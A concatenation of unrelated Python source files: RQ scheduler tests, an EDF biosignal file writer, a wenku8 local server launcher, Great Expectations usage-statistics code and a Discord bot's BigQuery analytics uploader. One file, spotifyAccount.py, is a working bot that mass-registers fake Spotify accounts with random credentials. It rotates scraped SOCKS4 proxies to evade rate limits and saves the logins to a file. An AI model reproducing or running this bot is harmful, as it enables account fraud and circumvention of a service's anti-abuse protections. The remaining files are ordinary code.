registry.schedule(job, datetime(2019, 1, 1, 7, tzinfo=tz))
self.assertEqual(self.testconn.zscore(registry.key, job.id),
1546300800) # 2019-01-01 UTC in Unix timestamp
class TestScheduler(RQTestCase):
def test_init(self):
"""Scheduler can be instantiated with queues or queue names"""
foo_queue = Queue('foo', connection=self.testconn)
scheduler = RQScheduler([foo_queue, 'bar'], connection=self.testconn)
self.assertEqual(scheduler._queue_names, {'foo', 'bar'})
self.assertEqual(scheduler.status, RQScheduler.Status.STOPPED)
def test_should_reacquire_locks(self):
"""scheduler.should_reacquire_locks works properly"""
queue = Queue(connection=self.testconn)
scheduler = RQScheduler([queue], connection=self.testconn)
self.assertTrue(scheduler.should_reacquire_locks)
scheduler.acquire_locks()
self.assertIsNotNone(scheduler.lock_acquisition_time)
# scheduler.should_reacquire_locks always returns False if
# scheduler.acquired_locks and scheduler._queue_names are the same
self.assertFalse(scheduler.should_reacquire_locks)
scheduler.lock_acquisition_time = datetime.now() - timedelta(minutes=16)
self.assertFalse(scheduler.should_reacquire_locks)
scheduler._queue_names = set(['default', 'foo'])
self.assertTrue(scheduler.should_reacquire_locks)
scheduler.acquire_locks()
self.assertFalse(scheduler.should_reacquire_locks)
def test_lock_acquisition(self):
"""Test lock acquisition"""
name_1 = 'lock-test-1'
name_2 = 'lock-test-2'
name_3 = 'lock-test-3'
scheduler = RQScheduler([name_1], self.testconn)
self.assertEqual(scheduler.acquire_locks(), {name_1})
self.assertEqual(scheduler._acquired_locks, {name_1})
self.assertEqual(scheduler.acquire_locks(), set([]))
# Only name_2 is returned since name_1 is already locked
scheduler = RQScheduler([name_1, name_2], self.testconn)
self.assertEqual(scheduler.acquire_locks(), {name_2})
self.assertEqual(scheduler._acquired_locks, {name_2})
# When a new lock is successfully acquired, _acquired_locks is added
scheduler._queue_names.add(name_3)
self.assertEqual(scheduler.acquire_locks(), {name_3})
self.assertEqual(scheduler._acquired_locks, {name_2, name_3})
def test_lock_acquisition_with_auto_start(self):
"""Test lock acquisition with auto_start=True"""
scheduler = RQScheduler(['auto-start'], self.testconn)
with mock.patch.object(scheduler, 'start') as mocked:
scheduler.acquire_locks(auto_start=True)
self.assertEqual(mocked.call_count, 1)
# If process has started, scheduler.start() won't be called
scheduler = RQScheduler(['auto-start2'], self.testconn)
scheduler._process = 1
with mock.patch.object(scheduler, 'start') as mocked:
scheduler.acquire_locks(auto_start=True)
self.assertEqual(mocked.call_count, 0)
def test_heartbeat(self):
"""Test that heartbeat updates locking keys TTL"""
name_1 = 'lock-test-1'
name_2 = 'lock-test-2'
scheduler = RQScheduler([name_1, name_2], self.testconn)
scheduler.acquire_locks()
locking_key_1 = RQScheduler.get_locking_key(name_1)
locking_key_2 = RQScheduler.get_locking_key(name_2)
with self.testconn.pipeline() as pipeline:
pipeline.expire(locking_key_1, 1000)
pipeline.expire(locking_key_2, 1000)
scheduler.heartbeat()
self.assertEqual(self.testconn.ttl(locking_key_1), 6)
self.assertEqual(self.testconn.ttl(locking_key_1), 6)
# scheduler.stop() releases locks and sets status to STOPPED
scheduler._status = scheduler.Status.WORKING
scheduler.stop()
self.assertFalse(self.testconn.exists(locking_key_1))
self.assertFalse(self.testconn.exists(locking_key_2))
self.assertEqual(scheduler.status, scheduler.Status.STOPPED)
# Heartbeat also works properly for schedulers with a single queue
scheduler = RQScheduler([name_1], self.testconn)
scheduler.acquire_locks()
self.testconn.expire(locking_key_1, 1000)
scheduler.heartbeat()
self.assertEqual(self.testconn.ttl(locking_key_1), 6)
def test_enqueue_scheduled_jobs(self):
"""Scheduler can enqueue scheduled jobs"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
job = Job.create('myfunc', connection=self.testconn)
job.save()
registry.schedule(job, datetime(2019, 1, 1, tzinfo=utc))
scheduler = RQScheduler([queue], connection=self.testconn)
scheduler.acquire_locks()
scheduler.enqueue_scheduled_jobs()
self.assertEqual(len(queue), 1)
# After job is scheduled, registry should be empty
self.assertEqual(len(registry), 0)
# Jobs scheduled in the far future should not be affected
registry.schedule(job, datetime(2100, 1, 1, tzinfo=utc))
scheduler.enqueue_scheduled_jobs()
self.assertEqual(len(queue), 1)
def test_prepare_registries(self):
"""prepare_registries() creates self._scheduled_job_registries"""
foo_queue = Queue('foo', connection=self.testconn)
bar_queue = Queue('bar', connection=self.testconn)
scheduler = RQScheduler([foo_queue, bar_queue], connection=self.testconn)
self.assertEqual(scheduler._scheduled_job_registries, [])
scheduler.prepare_registries([foo_queue.name])
self.assertEqual(scheduler._scheduled_job_registries, [ScheduledJobRegistry(queue=foo_queue)])
scheduler.prepare_registries([foo_queue.name, bar_queue.name])
self.assertEqual(
scheduler._scheduled_job_registries,
[ScheduledJobRegistry(queue=foo_queue), ScheduledJobRegistry(queue=bar_queue)]
)
class TestWorker(RQTestCase):
def test_work_burst(self):
"""worker.work() with scheduler enabled works properly"""
queue = Queue(connection=self.testconn)
worker = Worker(queues=[queue], connection=self.testconn)
worker.work(burst=True, with_scheduler=False)
self.assertIsNone(worker.scheduler)
worker = Worker(queues=[queue], connection=self.testconn)
worker.work(burst=True, with_scheduler=True)
self.assertIsNotNone(worker.scheduler)
@mock.patch.object(RQScheduler, 'acquire_locks')
def test_run_maintenance_tasks(self, mocked):
"""scheduler.acquire_locks() is called only when scheduled is enabled"""
queue = Queue(connection=self.testconn)
worker = Worker(queues=[queue], connection=self.testconn)
worker.run_maintenance_tasks()
self.assertEqual(mocked.call_count, 0)
worker.last_cleaned_at = None
worker.scheduler = RQScheduler([queue], connection=self.testconn)
worker.run_maintenance_tasks()
self.assertEqual(mocked.call_count, 0)
worker.last_cleaned_at = datetime.now()
worker.run_maintenance_tasks()
self.assertEqual(mocked.call_count, 1)
def test_work(self):
queue = Queue(connection=self.testconn)
worker = Worker(queues=[queue], connection=self.testconn)
p = Process(target=kill_worker, args=(os.getpid(), False, 5))
p.start()
queue.enqueue_at(datetime(2019, 1, 1, tzinfo=utc), say_hello)
worker.work(burst=False, with_scheduler=True)
p.join(1)
self.assertIsNotNone(worker.scheduler)
registry = FinishedJobRegistry(queue=queue)
self.assertEqual(len(registry), 1)
class TestQueue(RQTestCase):
def test_enqueue_at(self):
"""queue.enqueue_at() puts job in the scheduled"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
scheduler = RQScheduler([queue], connection=self.testconn)
scheduler.acquire_locks()
# Jobs created using enqueue_at is put in the ScheduledJobRegistry
job = queue.enqueue_at(datetime(2019, 1, 1, tzinfo=utc), say_hello)
self.assertEqual(len(queue), 0)
self.assertEqual(len(registry), 1)
# enqueue_at set job status to "scheduled"
self.assertTrue(job.get_status() == 'scheduled')
# After enqueue_scheduled_jobs() is called, the registry is empty
# and job is enqueued
scheduler.enqueue_scheduled_jobs()
self.assertEqual(len(queue), 1)
self.assertEqual(len(registry), 0)
def test_enqueue_in(self):
"""queue.enqueue_in() schedules job correctly"""
queue = Queue(connection=self.testconn)
registry = ScheduledJobRegistry(queue=queue)
job = queue.enqueue_in(timedelta(seconds=30), say_hello)
now = datetime.now(utc)
scheduled_time = registry.get_scheduled_time(job)
# Ensure that job is scheduled roughly 30 seconds from now
self.assertTrue(
now + timedelta(seconds=28) < scheduled_time < now + timedelta(seconds=32)
)
|
spotifyAccount.py
|
import platform
import random
import string
import threading
import time
from os import system
import requests
if platform.system() == "Windows": # checking OS
title = "windows"
else:
title = "linux"
def randomName(size=10, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
def randomPassword(size=14, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
global maxi
global created
created = 0
errors = 0
class proxy():
def update(self):
while True:
data = ''
urls = ["https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=10000&ssl=yes"]
for url in urls:
data += requests.get(url).text
self.splited += data.split("\r\n") #scraping and splitting proxies
time.sleep(600)
def get_proxy(self):
random1 = random.choice(self.splited) #choose a random proxie
return random1
def FormatProxy(self):
proxyOutput = {'https' :'socks4://'+self.get_proxy()}
return proxyOutput
def __init__(self):
self.splited = []
threading.Thread(target=self.update).start()
time.sleep(3)
proxy1 = proxy()
def creator():
global maxi
global created
global errors
while maxi > created:
if title == "windows":
system("title "+ f"Spotify Account Creator by KevinLage https://github.com/KevinLage/Spotify-Account-Creator Created: {created}/{maxi} Errors:{errors}")
s = requests.session()
email = randomName()
password = randomPassword()
data={
"displayname":"Josh",
"creation_point":"https://login.app.spotify.com?utm_source=spotify&utm_medium=desktop-win32&utm_campaign=organic",
"birth_month":"12",
"email":email + "@gmail.com",
"password":password,
"creation_flow":"desktop",
"platform":"desktop",
"birth_year":"1991",
"iagree":"1",
"key":"4c7a36d5260abca4af282779720cf631",
"birth_day":"17",
"gender":"male",
"password_repeat":password,
"referrer":""
}
try:
r = s.post("https://spclient.wg.spotify.com/signup/public/v1/account/",data=data,proxies=proxy1.FormatProxy())
if '{"status":1,"' in r.text:
open("created.txt", "a+").write(email + "@gmail.com:" + password + "\n")
created += 1
if title == "windows":
system("title "+ f"Spotify Account Creator : {created}/{maxi} Errors:{errors}")
else:
errors += 1
except:
pass
maxi = int(input("How many accounts do you want to create?\n"))
maxthreads = int(input("How many Threads?\n"))
num = 0
while num < maxthreads:
num += 1
threading.Thread(target=creator).start() # Start Checking Thread
|
fileIO.py
|
# -*- coding: utf-8 -*-
"""
@author: %(Mikel Val Calvo)s
@email: %(mikel1982mail@gmail.com)
@institution: %(Dpto. de Inteligencia Artificial, Universidad Nacional de Educación a Distancia (UNED))
@DOI: 10.5281/zenodo.3759306
Modified by: Pablo Couso (cousop@gmail.com)
"""
from EDF.writeEDFFile import edf_writter
from multiprocessing import Process
import numpy as np
#import os.remove
class io_manager():
def __init__(self, app): #Recibe la aplicación completa de RECORDING
self.app = app
self.edf = edf_writter(self.app.constants) #Introduce las constantes
# Crear un archivo EDF
def create_file(self):
# Se crea un nuevo fichero indicando el nombre = dirección + número de la prueba
self.edf.new_file(self.app.constants.PATH+'.edf')# + '_trial_' + str(self.app.constants.running_trial) + '.edf')
# Actualiza el texto del logger con la dirección indicando que se ha creado
self.app.log.update_text('* -- USER ' + self.app.constants.PATH + ' CREATED -- *')
# Cerrar archivo EDF
def close_file(self):
self.edf.close_file() #Se cierra el archivo
# Actualiza el texto del logger con la dirección indicando que se ha cerrado
self.app.log.update_text('* -- USER ' + self.app.constants.PATH + ' CLOSED -- *')
# Añadir datos al archivo
#### tarda mucho en guardar, probar hilos o guardar en variable allData hasta terminar registro y luego guardar en archivo
def append_to_file(self, all_data_store):
# Si se activa el fichero, se agregan los datos almacenados en el banco de datos al archivo
if self.app.constants.ispath:
if not self.app.constants.headerWritten:
self.edf.append(all_data_store)
# Se crea un proceso de escritura sobre el archivo EDF
p = Process(target=self.edf.firstWriteToEDF())
p.start()
self.app.constants.headerWritten = True
else:
self.edf.writeEDFSamples(all_data_store)
else:
print('* -- EDF file path is needed -- *')
# Crear un archivo .txt para hacer guardado dinámico de las señales
'''def create_txt_file(self):
fname = f"tmp{self.app.port[-4:]}.txt"
self.txt_file_path = "RESULTS/"+fname
self.txt_file = open(self.txt_file_path, "a")
def append_to_txt_file(self, data):
transposed_data = np.transpose(data)
np.savetxt(self.txt_file,transposed_data,delimiter=',')
def convert_txt2edf(self):
self.txt_file.close()
with open(self.txt_file_path, "r") as f:
saved_data = np.genfromtxt(f,delimiter=',',unpack=True)
print(saved_data.shape)
self.append_to_file(saved_data)
def delete_txt_file(self):
self.convert_txt2edf()
self.close_file()
#Falta implementar eliminacion
#os.remove(self.txt_file_path)'''
# Escribir una anotación
def online_annotation(self, notation): #Recibe la notificación
# Calcula el instante en el que se ha recibido la notificación:
# ventana actual * segundos por ventana = segundo actual
# columna actual del buffer % tamaño de ventana pequeño (ventana de muestreo) / frecuencia de muestreo = milisegundo actual
instant = self.app.constants.running_window*self.app.constants.SECONDS + (self.app.buffer.cur % self.app.buffer.size_short)/self.app.constants.SAMPLE_RATE
duration = -1
event = notation
self.edf.annotation(instant, duration, event) #Crear la notificación
|
wk8local.py
|
import os
os.environ['WENKU8_LOCAL'] = "True"
import time
import webbrowser
import threading
from error_report import *
try:
from server import *
from manage import logger
except Exception as e:
report_it(e, _exit=True)
local_version = 5009
def open_browser(url, sleep_time=3):
time.sleep(sleep_time)
webbrowser.open(url)
if __name__ == '__main__':
# 新开一个线程,延时然后打开浏览器
local_url = 'http://localhost:%s/' % local_version
logger.info('5秒钟后将自动打开浏览器。')
logger.info('使用完毕请关闭本窗口。')
logger.info('如果打开失败请刷新浏览器或者重新输入“%s”。' % local_url)
threading.Thread(target=open_browser, args=(local_url, 5)).start()
# app.run("0.0.0.0", port=int(os.environ.get('PORT', local_version)), debug=False)
run_simple("0.0.0.0", int(os.environ.get('PORT', local_version)), dm)
|
usage_statistics.py
|
import atexit
import copy
import datetime
import json
import logging
import platform
import signal
import sys
import threading
import time
from functools import wraps
from queue import Queue
from typing import Optional
import jsonschema
import requests
from great_expectations import __version__ as ge_version
from great_expectations.core import ExpectationSuite
from great_expectations.core.usage_statistics.anonymizers.anonymizer import Anonymizer
from great_expectations.core.usage_statistics.anonymizers.batch_anonymizer import (
BatchAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.batch_request_anonymizer import (
BatchRequestAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.checkpoint_run_anonymizer import (
CheckpointRunAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.data_docs_site_anonymizer import (
DataDocsSiteAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.datasource_anonymizer import (
DatasourceAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.execution_engine_anonymizer import (
ExecutionEngineAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.expectation_suite_anonymizer import (
ExpectationSuiteAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.store_anonymizer import (
StoreAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.types.base import (
CLISuiteInteractiveFlagCombinations,
)
from great_expectations.core.usage_statistics.anonymizers.validation_operator_anonymizer import (
ValidationOperatorAnonymizer,
)
from great_expectations.core.usage_statistics.schemas import (
anonymized_usage_statistics_record_schema,
)
from great_expectations.core.util import nested_update
from great_expectations.data_context.types.base import CheckpointConfig
STOP_SIGNAL = object()
logger = logging.getLogger(__name__)
_anonymizers = {}
class UsageStatisticsHandler:
def __init__(self, data_context, data_context_id, usage_statistics_url):
self._url = usage_statistics_url
self._data_context_id = data_context_id
self._data_context_instance_id = data_context.instance_id
self._data_context = data_context
self._ge_version = ge_version
self._message_queue = Queue()
self._worker = threading.Thread(target=self._requests_worker, daemon=True)
self._worker.start()
self._datasource_anonymizer = DatasourceAnonymizer(data_context_id)
self._execution_engine_anonymizer = ExecutionEngineAnonymizer(data_context_id)
self._store_anonymizer = StoreAnonymizer(data_context_id)
self._validation_operator_anonymizer = ValidationOperatorAnonymizer(
data_context_id
)
self._data_docs_sites_anonymizer = DataDocsSiteAnonymizer(data_context_id)
self._batch_request_anonymizer = BatchRequestAnonymizer(data_context_id)
self._batch_anonymizer = BatchAnonymizer(data_context_id)
self._expectation_suite_anonymizer = ExpectationSuiteAnonymizer(data_context_id)
self._checkpoint_run_anonymizer = CheckpointRunAnonymizer(data_context_id)
try:
self._sigterm_handler = signal.signal(signal.SIGTERM, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigterm_handler = None
try:
self._sigint_handler = signal.signal(signal.SIGINT, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigint_handler = None
atexit.register(self._close_worker)
def _teardown(self, signum: int, frame):
self._close_worker()
if signum == signal.SIGTERM and self._sigterm_handler:
self._sigterm_handler(signum, frame)
if signum == signal.SIGINT and self._sigint_handler:
self._sigint_handler(signum, frame)
def _close_worker(self):
self._message_queue.put(STOP_SIGNAL)
self._worker.join()
def _requests_worker(self):
session = requests.Session()
while True:
message = self._message_queue.get()
if message == STOP_SIGNAL:
self._message_queue.task_done()
return
try:
res = session.post(self._url, json=message, timeout=2)
logger.debug(
"Posted usage stats: message status " + str(res.status_code)
)
if res.status_code != 201:
logger.debug(
"Server rejected message: ", json.dumps(message, indent=2)
)
except requests.exceptions.Timeout:
logger.debug("Timeout while sending usage stats message.")
except Exception as e:
logger.debug("Unexpected error posting message: " + str(e))
finally:
self._message_queue.task_done()
def build_init_payload(self):
"""Adds information that may be available only after full data context construction, but is useful to
calculate only one time (for example, anonymization)."""
expectation_suites = [
self._data_context.get_expectation_suite(expectation_suite_name)
for expectation_suite_name in self._data_context.list_expectation_suite_names()
]
return {
"platform.system": platform.system(),
"platform.release": platform.release(),
"version_info": str(sys.version_info),
"anonymized_datasources": [
self._datasource_anonymizer.anonymize_datasource_info(
datasource_name, datasource_config
)
for datasource_name, datasource_config in self._data_context.project_config_with_variables_substituted.datasources.items()
],
"anonymized_stores": [
self._store_anonymizer.anonymize_store_info(store_name, store_obj)
for store_name, store_obj in self._data_context.stores.items()
],
"anonymized_validation_operators": [
self._validation_operator_anonymizer.anonymize_validation_operator_info(
validation_operator_name=validation_operator_name,
validation_operator_obj=validation_operator_obj,
)
for validation_operator_name, validation_operator_obj in self._data_context.validation_operators.items()
],
"anonymized_data_docs_sites": [
self._data_docs_sites_anonymizer.anonymize_data_docs_site_info(
site_name=site_name, site_config=site_config
)
for site_name, site_config in self._data_context.project_config_with_variables_substituted.data_docs_sites.items()
],
"anonymized_expectation_suites": [
self._expectation_suite_anonymizer.anonymize_expectation_suite_info(
expectation_suite
)
for expectation_suite in expectation_suites
],
}
def build_envelope(self, message):
message["version"] = "1.0.0"
message["ge_version"] = self._ge_version
message["data_context_id"] = self._data_context_id
message["data_context_instance_id"] = self._data_context_instance_id
message["event_time"] = (
datetime.datetime.now(datetime.timezone.utc).strftime(
"%Y-%m-%dT%H:%M:%S.%f"
)[:-3]
+ "Z"
)
event_duration_property_name: str = f'{message["event_name"]}.duration'.replace(
".", "_"
)
if hasattr(self, event_duration_property_name):
delta_t: int = getattr(self, event_duration_property_name)
message["event_duration"] = delta_t
return message
@staticmethod
def validate_message(message, schema):
try:
jsonschema.validate(message, schema=schema)
return True
except jsonschema.ValidationError as e:
logger.debug("invalid message: " + str(e))
return False
def send_usage_message(
self,
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
):
"""send a usage statistics message."""
# noinspection PyBroadException
try:
message: dict = {
"event": event,
"event_payload": event_payload or {},
"success": success,
}
self.emit(message)
except Exception:
pass
def emit(self, message):
"""
Emit a message.
"""
try:
if message["event"] == "data_context.__init__":
message["event_payload"] = self.build_init_payload()
message = self.build_envelope(message=message)
if not self.validate_message(
message, schema=anonymized_usage_statistics_record_schema
):
return
self._message_queue.put(message)
# noinspection PyBroadException
except Exception as e:
# We *always* tolerate *any* error in usage statistics
logger.debug(e)
def get_usage_statistics_handler(args_array):
try:
# If the object is usage_statistics-capable, then it will have a usage_statistics_handler
handler = getattr(args_array[0], "_usage_statistics_handler", None)
if handler is not None and not isinstance(handler, UsageStatisticsHandler):
logger.debug("Invalid UsageStatisticsHandler found on object.")
handler = None
except IndexError:
# A wrapped method that is not an object; this would be erroneous usage
logger.debug(
"usage_statistics enabled decorator should only be used on data context methods"
)
handler = None
except AttributeError:
# A wrapped method that is not usage_statistics capable
handler = None
except Exception as e:
# An unknown error -- but we still fail silently
logger.debug(
"Unrecognized error when trying to find usage_statistics_handler: " + str(e)
)
handler = None
return handler
def usage_statistics_enabled_method(
func=None, event_name=None, args_payload_fn=None, result_payload_fn=None
):
"""
A decorator for usage statistics which defaults to the less detailed payload schema.
"""
if callable(func):
if event_name is None:
event_name = func.__name__
@wraps(func)
def usage_statistics_wrapped_method(*args, **kwargs):
# if a function like `build_data_docs()` is being called as a `dry_run`
# then we dont want to emit usage_statistics. We just return the function without sending a usage_stats message
if "dry_run" in kwargs and kwargs["dry_run"]:
return func(*args, **kwargs)
# Set event_payload now so it can be updated below
event_payload = {}
message = {"event_payload": event_payload, "event": event_name}
result = None
time_begin: int = int(round(time.time() * 1000))
try:
if args_payload_fn is not None:
nested_update(event_payload, args_payload_fn(*args, **kwargs))
result = func(*args, **kwargs)
message["success"] = True
except Exception:
message["success"] = False
raise
finally:
if not ((result is None) or (result_payload_fn is None)):
nested_update(event_payload, result_payload_fn(result))
time_end: int = int(round(time.time() * 1000))
delta_t: int = time_end - time_begin
handler = get_usage_statistics_handler(args)
if handler:
event_duration_property_name: str = (
f"{event_name}.duration".replace(".", "_")
)
setattr(handler, event_duration_property_name, delta_t)
handler.emit(message)
delattr(handler, event_duration_property_name)
return result
return usage_statistics_wrapped_method
else:
# noinspection PyShadowingNames
def usage_statistics_wrapped_method_partial(func):
return usage_statistics_enabled_method(
func,
event_name=event_name,
args_payload_fn=args_payload_fn,
result_payload_fn=result_payload_fn,
)
return usage_statistics_wrapped_method_partial
# noinspection PyUnusedLocal
def run_validation_operator_usage_statistics(
data_context,
validation_operator_name,
assets_to_validate,
**kwargs,
):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
try:
payload["anonymized_operator_name"] = anonymizer.anonymize(
validation_operator_name
)
except TypeError:
logger.debug(
"run_validation_operator_usage_statistics: Unable to create validation_operator_name hash"
)
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
batch_anonymizer = data_context._usage_statistics_handler._batch_anonymizer
payload["anonymized_batches"] = [
batch_anonymizer.anonymize_batch_info(batch)
for batch in assets_to_validate
]
except Exception:
logger.debug(
"run_validation_operator_usage_statistics: Unable to create anonymized_batches payload field"
)
return payload
# noinspection SpellCheckingInspection
# noinspection PyUnusedLocal
def save_expectation_suite_usage_statistics(
data_context,
expectation_suite,
expectation_suite_name=None,
**kwargs,
):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if expectation_suite_name is None:
if isinstance(expectation_suite, ExpectationSuite):
expectation_suite_name = expectation_suite.expectation_suite_name
elif isinstance(expectation_suite, dict):
expectation_suite_name = expectation_suite.get("expectation_suite_name")
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
expectation_suite_name
)
except Exception:
logger.debug(
"save_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def edit_expectation_suite_usage_statistics(
data_context: "DataContext", # noqa: F821
expectation_suite_name: str,
interactive_mode: Optional[CLISuiteInteractiveFlagCombinations] = None,
):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
if interactive_mode is None:
payload = {}
else:
payload = copy.deepcopy(interactive_mode.value)
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
expectation_suite_name
)
except Exception:
logger.debug(
"edit_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def add_datasource_usage_statistics(data_context, name, **kwargs):
if not data_context._usage_statistics_handler:
return {}
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
# noinspection PyBroadException
try:
datasource_anonymizer = (
data_context._usage_statistics_handler._datasource_anonymizer
)
except Exception:
datasource_anonymizer = DatasourceAnonymizer(data_context_id)
payload = {}
# noinspection PyBroadException
try:
payload = datasource_anonymizer.anonymize_datasource_info(name, kwargs)
except Exception:
logger.debug(
"add_datasource_usage_statistics: Unable to create add_datasource_usage_statistics payload field"
)
return payload
# noinspection SpellCheckingInspection
def get_batch_list_usage_statistics(data_context, *args, **kwargs):
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
batch_request_anonymizer: BatchRequestAnonymizer = (
data_context._usage_statistics_handler._batch_request_anonymizer
)
payload = batch_request_anonymizer.anonymize_batch_request(*args, **kwargs)
except Exception:
logger.debug(
"get_batch_list_usage_statistics: Unable to create anonymized_batch_request payload field"
)
return payload
# noinspection PyUnusedLocal
def get_checkpoint_run_usage_statistics(checkpoint, *args, **kwargs):
try:
data_context_id = checkpoint.data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if checkpoint._usage_statistics_handler:
# noinspection PyBroadException
try:
checkpoint_run_anonymizer: CheckpointRunAnonymizer = (
checkpoint._usage_statistics_handler._checkpoint_run_anonymizer
)
checkpoint_config: CheckpointConfig = copy.deepcopy(checkpoint.config)
substituted_runtime_config: CheckpointConfig = (
checkpoint_run_anonymizer.resolve_config_using_acceptable_arguments(
*(checkpoint,), **kwargs
)
)
resolved_runtime_kwargs: dict = substituted_runtime_config.to_json_dict()
payload = checkpoint_run_anonymizer.anonymize_checkpoint_run(
*(checkpoint,), **resolved_runtime_kwargs
)
checkpoint._config = checkpoint_config
except Exception:
logger.debug(
"get_batch_list_usage_statistics: Unable to create anonymized_checkpoint_run payload field"
)
return payload
def send_usage_message(
data_context,
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
):
"""send a usage statistics message."""
# noinspection PyBroadException
try:
handler: UsageStatisticsHandler = getattr(
data_context, "_usage_statistics_handler", None
)
message: dict = {
"event": event,
"event_payload": event_payload,
"success": success,
}
if handler is not None:
handler.emit(message)
except Exception:
pass
|
analytics.py
|
import logging
import io
import json
import datetime
import threading
import time
from typing import Union
from google.cloud import bigquery
import discord
from discord.ext import commands
from discord_slash import SlashContext
# Set up logging
logger = logging.getLogger(__name__)
def run_on_another_thread(function):
"""
This decorator will run the decorated function in another thread, starting it immediately.
:param function:
:return:
"""
def f(*args, **kargs):
threading.Thread(target=function, args=[*args, *kargs]).start()
return f
def _is_blacklisted(context: commands.Context):
# Ignore dev server
if isinstance(context.channel, discord.TextChannel) and context.channel.guild.id in [454852632528420876, 799455809297842177]:
logger.info(f'Ignoring analytics submission for development server.')
return True
return False
def get_guild_and_channel_id(context: commands.Context):
if isinstance(context.channel, discord.TextChannel):
return context.channel.guild.id, context.channel.id
elif isinstance(context.channel, discord.DMChannel):
return None, context.channel.id
def to_bq_file(items):
return io.StringIO('\n'.join([json.dumps(x) for x in items]))
def upload(config):
client = bigquery.Client()
logger.info(f'Uploading {len(config["queue"])} items to {config["table"]}')
data_as_file = to_bq_file(config['queue'])
job = client.load_table_from_file(data_as_file, config['table'], job_config=config['job_config'])
try:
job.result() # Waits for the job to complete.
config['queue'].clear()
except Exception as e:
logger.exception(f'Failed BigQuery upload job! Errors: {job.errors}', exc_info=e)
def create_qal_item(table, job_config):
return {
'queue': [],
'lock': threading.Lock(),
'table': table,
'job_config': job_config
}
# Queues and locks
qal = {
'log_command': create_qal_item(
'formal-scout-290305.analytics.commands',
bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("command_name", "STRING", mode="REQUIRED"),
bigquery.SchemaField("is_slash", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("guild_id", "INTEGER"),
bigquery.SchemaField("channel_id", "INTEGER"),
bigquery.SchemaField("time", "TIMESTAMP"),
],
source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON,
autodetect=True
)
),
'log_definition_request': create_qal_item(
'formal-scout-290305.analytics.definition_requests',
bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("word", "STRING", mode="REQUIRED"),
bigquery.SchemaField("reverse", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("text_to_speech", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("language", "STRING", mode="REQUIRED"),
bigquery.SchemaField("guild_id", "INTEGER"),
bigquery.SchemaField("channel_id", "INTEGER"),
bigquery.SchemaField("time", "TIMESTAMP"),
],
source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON,
autodetect=True
)
),
'log_dictionary_api_request': create_qal_item(
'formal-scout-290305.analytics.dictionary_api_requests',
bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("api_name", "STRING", mode="REQUIRED"),
bigquery.SchemaField("success", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("time", "TIMESTAMP", mode="REQUIRED")
],
source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON,
autodetect=True
)
)
}
def analytics_uploader_thread():
while True:
time.sleep(60 * 5)
for key, value in qal.items():
try:
queue = value['queue']
lock = value['lock']
with lock:
if len(queue) > 0:
upload(value)
except Exception as e:
logger.exception('Error uploading analytics!', exc_info=e)
threading.Thread(target=analytics_uploader_thread).start()
@run_on_another_thread
def log_command(command_name: str, is_slash: bool, context: Union[commands.Context, SlashContext]):
queue = qal['log_command']['queue']
with qal['log_command']['lock']:
if _is_blacklisted(context):
return
guild_id, channel_id = get_guild_and_channel_id(context)
data = {
'command_name': command_name,
'is_slash': is_slash,
'guild_id': guild_id,
'channel_id': channel_id,
'time': datetime.datetime.now().isoformat()
}
queue.append(data)
@run_on_another_thread
def log_definition_request(word: str, reverse: bool, text_to_speech: bool, language: str, context: commands.Context):
queue = qal['log_definition_request']['queue']
with qal['log_definition_request']['lock']:
if _is_blacklisted(context):
return
